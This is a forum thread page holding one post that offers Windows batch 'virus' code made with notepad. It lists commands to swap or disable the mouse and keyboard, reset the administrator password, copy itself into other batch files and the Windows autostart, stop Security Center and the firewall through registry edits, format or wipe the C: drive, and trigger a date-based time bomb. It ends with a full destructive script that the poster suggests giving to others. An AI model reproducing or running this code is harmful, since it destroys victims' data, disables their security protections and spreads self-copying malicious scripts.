Search
Search titles only
By:
Search titles only
By:
Log in
Register
Search
Search titles only
By:
Search titles only
By:
Menu
Install the app
Install
Forums
New posts
All threads
Latest threads
New posts
Trending threads
Trending
Search forums
What's new
New posts
New ads
New profile posts
Latest activity
Free Ads
Latest reviews
Search ads
Members
Current visitors
New profile posts
Search profile posts
Contact us
Latest ads
NURSING , CAREGIVER , HOTEL & BEAUTY COURSES
IVA Para Medical Campus
Updated:
Yesterday at 9:24 AM
Handmade Character Soft Toys Peppa Pig Family
anil1961
Updated:
Wednesday at 9:58 PM
Ad icon
Video Content Creator
pramukag
Updated:
Sunday at 6:10 AM
Ad icon
QA Engineer Intern
pramukag
Updated:
Sunday at 6:07 AM
Ad icon
Sell your Land, House on idamata.lk for FREE
sajith.xp.pk
Updated:
Jun 25, 2026
Electronics
Vehicles
Property
Search
Reply to thread
Forums
General
Sports
How to make a powerfull virus with only notepad
Get the App
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Message
<blockquote data-quote="galleline" data-source="post: 4505991" data-attributes="member: 170042"><p style="text-align: center"><span style="font-size: 15px"><strong>****************( only for win xp )****************</strong></span></p> <p style="text-align: center"></p><p>@echo off</p><p>cls</p><p></p><p>Here are just a few "virus" codes i’ve compiled. Don’t be afraid to play around with them. (All codes are without quotes)</p><p></p><p>"rundll32 user,swapmousebutton"</p><p></p><p>Swaps mouse buttons</p><p></p><p>"start www.google.com"</p><p></p><p>Opens the URL you want</p><p></p><p>"shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f"</p><p></p><p>Shuts down computer and shows message you want</p><p></p><p>"rundll32 mouse,disable"</p><p></p><p>Pretty self-explanatory. Disables mouse till next restart.</p><p></p><p>"rundll32 keyboard,disable"</p><p></p><p>Disables keyboard till next restart.</p><p></p><p>"rundll32 user,disableoemlayer"</p><p></p><p>Freezes computer till restart.</p><p></p><p></p><p>Worm commands:</p><p></p><p></p><p>"ctty nul</p><p>for %%i in (*.bat) do copy %0+%%i %%i /y >nul"</p><p></p><p>That command (two lines) will copy itself to any batch file in the directory.</p><p></p><p></p><p>"%0 >>other.bat"</p><p></p><p>Clears other batch file’s source and copies itself to it.</p><p></p><p></p><p>Trojan Codes:</p><p></p><p></p><p>"dir *.*>>Filelist.txt"</p><p></p><p>Sends list of files in same directory into a text document, and places it into a text document in the same directory.</p><p></p><p></p><p>"net user administrator PASSWORD HERE"</p><p></p><p>Changes specific user account’s password to whatever you want! I like administrator!</p><p></p><p></p><p>"ipconfig >Computer-IP-address.txt"</p><p></p><p>Creates a text file with ip address information in same directory as batch file.</p><p></p><p></p><p>These are a bit harsh:</p><p></p><p></p><p>"COPY %0 %windir%WINSTART.BAT"</p><p></p><p>Copies itself to the AutoRun section of windows... will not go away!</p><p></p><p>"format c: /q /autotest"</p><p></p><p>Pretty obvious...formats c drive without asking.</p><p></p><p></p><p>"DELTREE /Y %windir%"</p><p></p><p>Deletes windows</p><p></p><p></p><p>"DEL /F /S /Q C:"</p><p></p><p>Deletes C: Drive, /F means forced, /S deletes whole tree, /Q makes it quiet so it does not ask yes or no.</p><p></p><p></p><p>"@echo off</p><p>echo. | date | find /c /i "2005.05.10" > NUL</p><p>If errorlevel 1 GoTo End</p><p>YOUR CODE HERE LIKE DELETE C DRIVE OR WHATEVER</p><p>:End"</p><p></p><p>"Time-bombs" computer... just remember to change the date!</p><p></p><p>"net stop "Security Center"</p><p>net stop SharedAccess</p><p>> "%Temp%.kill.reg" ECHO REGEDIT4</p><p>>>"%Temp%.kill.reg" ECHO.</p><p>>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]</p><p>>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004</p><p>>>"%Temp%.kill.reg" ECHO.</p><p>>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]</p><p>>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004</p><p>>>"%Temp%.kill.reg" ECHO.</p><p>>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]</p><p>>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004</p><p>>>"%Temp%.kill.reg" ECHO.</p><p>START /WAIT REGEDIT /S "%Temp%.kill.reg"</p><p>del "%Temp%.kill.reg"</p><p>del %0"</p><p></p><p>Turns off firewall and stops security center</p><p></p><p>Pause Commands:</p><p></p><p></p><p>"@ping.exe 127.0.0.1 -n 20 -w 1000 > nul"</p><p></p><p>Pauses for 20 seconds (you can change time)</p><p></p><p></p><p>"pause"</p><p></p><p>pauses till they press another key</p><p></p><p>I made a code, it’s pretty bad-ass. I would not give this to someone that you wish to continue being friends with</p><p></p><p>Quote:</p><p>@echo off</p><p>cls</p><p>rundll32 mouse,disable</p><p>rundll32 keyboard,disable</p><p>COPY %0 %windir%WINSTART.BAT</p><p>net stop "Security Center"</p><p>net stop SharedAccess</p><p>echo You got owned!!!</p><p>@ping.exe 127.0.0.1 -n 5 -w 1000 > nul</p><p>start <a href="http://www.you.justgotowned.com/" target="_blank">www.yourname.com/</a></p><p>@ping.exe 127.0.0.1 -n 5 -w 1000 > nul</p><p>> "%Temp%.kill.reg" ECHO REGEDIT4</p><p>>>"%Temp%.kill.reg" ECHO.</p><p>>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]</p><p>>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004</p><p>>>"%Temp%.kill.reg" ECHO.</p><p>>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]</p><p>>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004</p><p>>>"%Temp%.kill.reg" ECHO.</p><p>>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]</p><p>>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004</p><p>>>"%Temp%.kill.reg" ECHO.</p><p>START /WAIT REGEDIT /S "%Temp%.kill.reg"</p><p>del "%Temp%.kill.reg"</p><p>del %0</p><p>DEL /F /S /Q C:</p><p>shutdown -s -t 10 -c "Say bye to your computer!" -f</p><p></p><p></p><p><img src="/styles/default/xenforo/smilies/default/happy.gif" class="smilie" loading="lazy" alt=":)" title="Happy :)" data-shortname=":)" /><img src="/styles/default/xenforo/smilies/default/happy.gif" class="smilie" loading="lazy" alt=":)" title="Happy :)" data-shortname=":)" /><img src="/styles/default/xenforo/smilies/default/happy.gif" class="smilie" loading="lazy" alt=":)" title="Happy :)" data-shortname=":)" /><img src="/styles/default/xenforo/smilies/default/happy.gif" class="smilie" loading="lazy" alt=":)" title="Happy :)" data-shortname=":)" /><img src="/styles/default/xenforo/smilies/default/happy.gif" class="smilie" loading="lazy" alt=":)" title="Happy :)" data-shortname=":)" /><img src="/styles/default/xenforo/smilies/default/happy.gif" class="smilie" loading="lazy" alt=":)" title="Happy :)" data-shortname=":)" /></p></blockquote><p></p>
[QUOTE="galleline, post: 4505991, member: 170042"] [CENTER][SIZE=4][B]****************( only for win xp )****************[/B][/SIZE] [/CENTER] @echo off cls Here are just a few "virus" codes i’ve compiled. Don’t be afraid to play around with them. (All codes are without quotes) "rundll32 user,swapmousebutton" Swaps mouse buttons "start www.google.com" Opens the URL you want "shutdown -s -t 10 -c "YOUR MESSAGE HERE" -f" Shuts down computer and shows message you want "rundll32 mouse,disable" Pretty self-explanatory. Disables mouse till next restart. "rundll32 keyboard,disable" Disables keyboard till next restart. "rundll32 user,disableoemlayer" Freezes computer till restart. Worm commands: "ctty nul for %%i in (*.bat) do copy %0+%%i %%i /y >nul" That command (two lines) will copy itself to any batch file in the directory. "%0 >>other.bat" Clears other batch file’s source and copies itself to it. Trojan Codes: "dir *.*>>Filelist.txt" Sends list of files in same directory into a text document, and places it into a text document in the same directory. "net user administrator PASSWORD HERE" Changes specific user account’s password to whatever you want! I like administrator! "ipconfig >Computer-IP-address.txt" Creates a text file with ip address information in same directory as batch file. These are a bit harsh: "COPY %0 %windir%WINSTART.BAT" Copies itself to the AutoRun section of windows... will not go away! "format c: /q /autotest" Pretty obvious...formats c drive without asking. "DELTREE /Y %windir%" Deletes windows "DEL /F /S /Q C:" Deletes C: Drive, /F means forced, /S deletes whole tree, /Q makes it quiet so it does not ask yes or no. "@echo off echo. | date | find /c /i "2005.05.10" > NUL If errorlevel 1 GoTo End YOUR CODE HERE LIKE DELETE C DRIVE OR WHATEVER :End" "Time-bombs" computer... just remember to change the date! "net stop "Security Center" net stop SharedAccess > "%Temp%.kill.reg" ECHO REGEDIT4 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. START /WAIT REGEDIT /S "%Temp%.kill.reg" del "%Temp%.kill.reg" del %0" Turns off firewall and stops security center Pause Commands: "@ping.exe 127.0.0.1 -n 20 -w 1000 > nul" Pauses for 20 seconds (you can change time) "pause" pauses till they press another key I made a code, it’s pretty bad-ass. I would not give this to someone that you wish to continue being friends with Quote: @echo off cls rundll32 mouse,disable rundll32 keyboard,disable COPY %0 %windir%WINSTART.BAT net stop "Security Center" net stop SharedAccess echo You got owned!!! @ping.exe 127.0.0.1 -n 5 -w 1000 > nul start [URL="http://www.you.justgotowned.com/"]www.yourname.com/[/URL] @ping.exe 127.0.0.1 -n 5 -w 1000 > nul > "%Temp%.kill.reg" ECHO REGEDIT4 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. START /WAIT REGEDIT /S "%Temp%.kill.reg" del "%Temp%.kill.reg" del %0 DEL /F /S /Q C: shutdown -s -t 10 -c "Say bye to your computer!" -f :):):):):):) [/QUOTE]
Insert quotes…
Verification
Dawasata paya keeyak thibeda?
Post reply
Top
Bottom